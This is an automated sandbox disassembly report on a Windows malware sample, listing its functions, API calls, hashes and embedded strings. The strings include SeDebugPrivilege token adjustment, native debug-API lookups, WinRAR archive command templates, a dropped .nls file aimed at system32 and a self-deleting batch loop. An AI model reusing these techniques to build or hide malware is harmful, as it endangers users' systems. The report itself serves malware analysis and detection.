Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
API String ID: 2042498389-2612645121
Opcode ID: 871303ecc8c02753416ccb5c4b2d72d461d645bf6658099336676aec496d72d3
Instruction ID: 7df2576a0a934555ac2f0e560e4e5a3658c1de4fdb7a2e46a512277087f732a3
Opcode Fuzzy Hash: 871303ecc8c02753416ccb5c4b2d72d461d645bf6658099336676aec496d72d3
Instruction Fuzzy Hash: 95018F716413207BD716ABA5EC0AEEF7E6CEF02B66F504110FD05E61E2D6A09A48C7E0

Function 003514E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00351504
VirtualQuery.KERNEL32(003514E1,?,0000001C), ref: 00351525
ExitProcess.KERNEL32 ref: 0035157A

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 086672c597043e23879eeea8fb1cb2f3864f7528171ebb5b6ac397df37e5876b
Instruction ID: ea72a25cbceb4ad474a5895de2e32e62397d88d8627a20c058d5b6caeaba4951
Opcode Fuzzy Hash: 086672c597043e23879eeea8fb1cb2f3864f7528171ebb5b6ac397df37e5876b
Instruction Fuzzy Hash: FA114871900304DFCB23DFA6A884B7AB7BCEB8575BF11442AE80296171E2708985AB90

Function 00351915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00351933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00351947

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 5a08b2617454f45ebf56ff516d6a64af022349adc7a4955ee3966977df7d461c
Instruction ID: 4e8437b6f0a47b61dd5a5fe3afd3f8913926659e015e5e68abb8cad664890c92
Opcode Fuzzy Hash: 5a08b2617454f45ebf56ff516d6a64af022349adc7a4955ee3966977df7d461c
Instruction Fuzzy Hash: 90F04432200309ABD7229E66DC04FA777ACAB50362F01853AFD16D64B0E770D64DDBE0

Function 00356159 Relevance: 2.6, APIs: 2, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00356189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003561A5

Memory Dump Source

Source File: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
Instruction ID: e8811f3fad31532d296a36f9d5f64f012d9d77c06fc73b2a4120166c9b19b44b
Opcode Fuzzy Hash: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
Instruction Fuzzy Hash: 93215131600649CFCB728F58CC82BED77A1FF45302FAA0419DD899B6A1DA716954CB94

Non-executed Functions

Function 0035119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,003513EF), ref: 003511AB
OpenProcessToken.ADVAPI32(00000000,00000028,003513EF,?,?,?,?,?,?,003513EF), ref: 003511BB
AdjustTokenPrivileges.ADVAPI32(003513EF,00000000,?,00000010,00000000,00000000), ref: 003511EB
CloseHandle.KERNEL32(003513EF), ref: 003511FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,003513EF), ref: 00351203

Strings

C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 003511A5

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
API String ID: 75692138-2612645121
Opcode ID: 3a1b252bd8cce11175167f69f2f72fb7df641e5a260fafb3f7cdf27bf809dd22
Instruction ID: abbe8300ef25ea9b51fbb09357c98127cb124e7027029005a0c5eefa500c84b6
Opcode Fuzzy Hash: 3a1b252bd8cce11175167f69f2f72fb7df641e5a260fafb3f7cdf27bf809dd22
Instruction Fuzzy Hash: 6F01E8B5900309EFDB02DFD4CD89AAEBBBCFB04346F504469E606A21A1D7715F449B50

Function 0035139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 003513BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003513DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00351448

Part of subcall function 0035119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,003513EF), ref: 003511AB
Part of subcall function 0035119F: OpenProcessToken.ADVAPI32(00000000,00000028,003513EF,?,?,?,?,?,?,003513EF), ref: 003511BB
Part of subcall function 0035119F: AdjustTokenPrivileges.ADVAPI32(003513EF,00000000,?,00000010,00000000,00000000), ref: 003511EB
Part of subcall function 0035119F: CloseHandle.KERNEL32(003513EF), ref: 003511FA
Part of subcall function 0035119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,003513EF), ref: 00351203

Strings

SeDebugPrivilege, xrefs: 003513D3
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 003513A8

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SeDebugPrivilege
API String ID: 4123949106-1990086918
Opcode ID: 0ed9d0d31b99a446a4b7a718a04c4bd5dfc1d634554350b24872d1999b962a18
Instruction ID: 4126f564e0a6fb7504b7dbce77b4f9c8c30ef3b129755398f09442bc4c456cd4
Opcode Fuzzy Hash: 0ed9d0d31b99a446a4b7a718a04c4bd5dfc1d634554350b24872d1999b962a18
Instruction Fuzzy Hash: FC3195B1D40209EADF62DBA6CC45FEEBBB8EB44706F124069E905B7161D7309E49CB60

Function 0035239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 003523CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00352464
GetFileSize.KERNEL32(00000000,00000000), ref: 00352472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 003524A8
memset.MSVCRT ref: 003524B9
strrchr.MSVCRT ref: 003524C9
wsprintfA.USER32 ref: 003524DE
strrchr.MSVCRT ref: 003524ED
memset.MSVCRT ref: 003524F2
memset.MSVCRT ref: 00352505
wsprintfA.USER32 ref: 00352524
Sleep.KERNEL32(000007D0), ref: 00352535
Sleep.KERNEL32(000007D0), ref: 0035255D
memset.MSVCRT ref: 0035256E
wsprintfA.USER32 ref: 00352585
memset.MSVCRT ref: 003525A6
wsprintfA.USER32 ref: 003525CA
Sleep.KERNEL32(000007D0), ref: 003525D0
Sleep.KERNEL32(000007D0,?,?), ref: 003525E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003525FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00352611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00352642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0035265B
SetEndOfFile.KERNEL32 ref: 0035266D
CloseHandle.KERNEL32(00000000), ref: 00352676
RemoveDirectoryA.KERNEL32(?), ref: 00352681

Strings

%s\, xrefs: 0035257F
%s%s, xrefs: 003524D8
%s X -ibck "%s" "%s\", xrefs: 0035251E
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 003525C4
-ibck, xrefs: 003525BA
C:\Users\user\AppData\Local\Temp\, xrefs: 003523B1, 003523B6, 003524CD

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-1636733187
Opcode ID: 7b3958c8cdb82c8710fb5b141260eba58d46ccc4730eea4b9a547e71711a513b
Instruction ID: 9c17dbd1d1ad8d5fda22fb0cbf80fae34879a98c7100650b474d4b05e1cd222e
Opcode Fuzzy Hash: 7b3958c8cdb82c8710fb5b141260eba58d46ccc4730eea4b9a547e71711a513b
Instruction Fuzzy Hash: 9681AFB1504344ABD7129F60DC49FABB7ACFB89746F00091AFA45D31B0D7709A898BA6

Function 0035274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00352766
memset.MSVCRT ref: 00352774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00352787
wsprintfA.USER32 ref: 003527AB

Part of subcall function 0035185B: GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
Part of subcall function 0035185B: srand.MSVCRT ref: 00351878
Part of subcall function 0035185B: rand.MSVCRT ref: 00351880
Part of subcall function 0035185B: srand.MSVCRT ref: 00351890
Part of subcall function 0035185B: rand.MSVCRT ref: 00351894

wsprintfA.USER32 ref: 003527C6
CopyFileA.KERNEL32(?,00354C80,00000000), ref: 003527D4
wsprintfA.USER32 ref: 003527F4

Part of subcall function 00351973: PathFileExistsA.SHLWAPI(\N5`N5,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351992
Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003519BA
Part of subcall function 00351973: Sleep.KERNEL32(00000064), ref: 003519C6
Part of subcall function 00351973: wsprintfA.USER32 ref: 003519EC
Part of subcall function 00351973: CopyFileA.KERNEL32(?,?,00000000), ref: 00351A00
Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00351A1E
Part of subcall function 00351973: GetFileSize.KERNEL32(?,00000000), ref: 00351A2C
Part of subcall function 00351973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00351A46
Part of subcall function 00351973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00351A65

DeleteFileA.KERNEL32(?,?,00354E54,00354E58), ref: 0035281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00354E54,00354E58), ref: 00352832

Strings

%s%s, xrefs: 003527A5
c_31892.nls, xrefs: 003527DE
%s\%s, xrefs: 003527EE
%s%.8x.exe, xrefs: 003527BB
\WinRAR\Rar.exe, xrefs: 00352793
C:\Users\user\AppData\Local\Temp\, xrefs: 003527B6
C:\Windows\system32, xrefs: 003527E3

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3642343254
Opcode ID: 3d27b47970bb0a4437d36e17fbcde3050c9bb3e6ea1271c5237444d65557697e
Instruction ID: 9da3e5010f4b2e3806adfe4b02760d48ff130cc0f3fb7ad6c3f77bfc6b886bd6
Opcode Fuzzy Hash: 3d27b47970bb0a4437d36e17fbcde3050c9bb3e6ea1271c5237444d65557697e
Instruction Fuzzy Hash: 102145B694031C7BDB12E7A4DC89FDB776CEB0574AF4005A1FA45E3061E6709F8C8AA0

Function 00351581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035185B: GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
Part of subcall function 0035185B: srand.MSVCRT ref: 00351878
Part of subcall function 0035185B: rand.MSVCRT ref: 00351880
Part of subcall function 0035185B: srand.MSVCRT ref: 00351890
Part of subcall function 0035185B: rand.MSVCRT ref: 00351894

wsprintfA.USER32 ref: 003515AA
wsprintfA.USER32 ref: 003515C6
lstrlen.KERNEL32(?), ref: 003515D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003515EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00351609
CloseHandle.KERNEL32(00000000), ref: 00351612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0035162D

Strings

:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 003515C0
open, xrefs: 00351627
C:\Users\user\AppData\Local\Temp\, xrefs: 00351599
%s%.8x.bat, xrefs: 003515A4
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 0035158A, 003515B3, 003515B8, 003515B9

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$open
API String ID: 617340118-3616273218
Opcode ID: 324c4e80a0821b846215cf831ee1a9bc2695e6b804dd899805ffdf1ccf911613
Instruction ID: 4dc803e43c91ae2315fd50d6d371afc2e1dab95f9508715ff949e728894201ab
Opcode Fuzzy Hash: 324c4e80a0821b846215cf831ee1a9bc2695e6b804dd899805ffdf1ccf911613
Instruction Fuzzy Hash: C61137769012287BD72297A5DC89EEB7B6CDF59796F000051FD49E3061DA709B888BB0

Function 0035120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00351400), ref: 00351226
GetProcAddress.KERNEL32(00000000), ref: 0035122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00351400), ref: 0035123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00351400), ref: 00351250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00351400), ref: 0035129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00351400), ref: 003512B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00351400), ref: 003512F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00351400), ref: 0035130A

Strings

ZwQuerySystemInformation, xrefs: 00351212
ntdll.dll, xrefs: 00351219
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00351262

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-4221281799
Opcode ID: b30d4a5ceefa37345c240ae15f773fceab49e076d8ff9f2b770cba0011ba7575
Instruction ID: 50b063583ad5fa1aad44b4e6067b6e120095e324ef755ab6be14562b28c31824
Opcode Fuzzy Hash: b30d4a5ceefa37345c240ae15f773fceab49e076d8ff9f2b770cba0011ba7575
Instruction Fuzzy Hash: B321F231645311ABD7239B65CC08F6BBAACFB85B82F010D18FA46D72A0C770DA48C7A5

Function 0035189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003518B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75570F00,76C08400), ref: 003518D3
CloseHandle.KERNEL32(I%5), ref: 003518E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 003518F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00351901
CloseHandle.KERNEL32(?), ref: 0035190A

Strings

I%5, xrefs: 003518E0

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%5
API String ID: 876959470-1045068697
Opcode ID: c12456423ce512f50dd478df2fb98ee3645615fe734ea257570ce0ed460a0be8
Instruction ID: 6c42aa841c8e981149fa73f296c38010767c54e54fc6eee5d3d17632fe3d2b68
Opcode Fuzzy Hash: c12456423ce512f50dd478df2fb98ee3645615fe734ea257570ce0ed460a0be8
Instruction Fuzzy Hash: F3017176901228BBCB226B95DC48DDFBF7DEF85761F104021F916A61A0D6314A18CAA0

Function 00352692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,003529DB,?,00000001), ref: 003526A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,003529DB,?,00000001), ref: 003526B5
lstrlen.KERNEL32(?), ref: 003526C4
??2@YAPAXI@Z.MSVCRT ref: 003526CE
lstrcpy.KERNEL32(00000004,?), ref: 003526E3
lstrcpy.KERNEL32(?,00000004), ref: 0035271F
??3@YAXPAX@Z.MSVCRT ref: 0035272D
SetEvent.KERNEL32 ref: 0035273C

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: dc4fae2ae27afc94f990bf528f2e5ced8fdf24227e1e1745d0da8ab928fcf258
Instruction ID: 378559b36b9c719826ebc6694f5a50125643108404340e382316d60860ed23d6
Opcode Fuzzy Hash: dc4fae2ae27afc94f990bf528f2e5ced8fdf24227e1e1745d0da8ab928fcf258
Instruction Fuzzy Hash: BC116736500300AFCB279F19EC48C6B7BADFB9A767B114025FC5987171D6708989DB50

Function 00351B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00351BCD
rand.MSVCRT ref: 00351BD8
memset.MSVCRT ref: 00351C43
memcpy.MSVCRT ref: 00351C4F
lstrcat.KERNEL32(?,.exe), ref: 00351C5D

Strings

.exe, xrefs: 00351C57
crVtgpviMHzkomTjFCevkEXGbNYRMEPBNYOSVohInyiZgDUpumPwztDaQuLJNjrxRaLkiJQufSGFtfAHceRmgdBKlHwEpOLzSDaqWWPsJljhKbvsxUlreWyIfGwZxOdqdhnFnYQbCTTyUXZqcsoBCMVAKXIA, xrefs: 00351B8A, 00351B9C, 00351C15, 00351C49

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$crVtgpviMHzkomTjFCevkEXGbNYRMEPBNYOSVohInyiZgDUpumPwztDaQuLJNjrxRaLkiJQufSGFtfAHceRmgdBKlHwEpOLzSDaqWWPsJljhKbvsxUlreWyIfGwZxOdqdhnFnYQbCTTyUXZqcsoBCMVAKXIA
API String ID: 122620767-727462888
Opcode ID: eddb88f97d5b412bc15a9d79165f5c80ae1b4be675122c616bc17671080f78d9
Instruction ID: 6f37bb58d55a4bb8f389fde5dda40838d773b1bf24ee999b69682464d38e4446
Opcode Fuzzy Hash: eddb88f97d5b412bc15a9d79165f5c80ae1b4be675122c616bc17671080f78d9
Instruction Fuzzy Hash: D7210A32E443906ED21B133A6C51F6A3A988FA3717F174099FD861B1B3D26409C9C361

Function 00351319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00351334
GetProcAddress.KERNEL32(00000000), ref: 0035133B
memset.MSVCRT ref: 00351359

Strings

NtSystemDebugControl, xrefs: 0035132A
ntdll.dll, xrefs: 0035132F

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 38a0747a789bc3d72e1fd62ba3f359828a12c295b9c048282d909b798fccf4a4
Instruction ID: 59e2b1131023ef794f7a7d8fb14882a3d5c29ece630b2fb709428a5a70bdb853
Opcode Fuzzy Hash: 38a0747a789bc3d72e1fd62ba3f359828a12c295b9c048282d909b798fccf4a4
Instruction Fuzzy Hash: 36016D7560030DAFDB12DFA4AC85EAFBBBCFB41316F00452AFD01A21A0E3708659CA91

Function 00351DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00351E0B
lstrcpy.KERNEL32(?,00000001), ref: 00351E1C
strrchr.MSVCRT ref: 00351E2B
lstrcmpiA.KERNEL32(?,00354488), ref: 00351E48
lstrlen.KERNEL32(00354488), ref: 00351E53

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
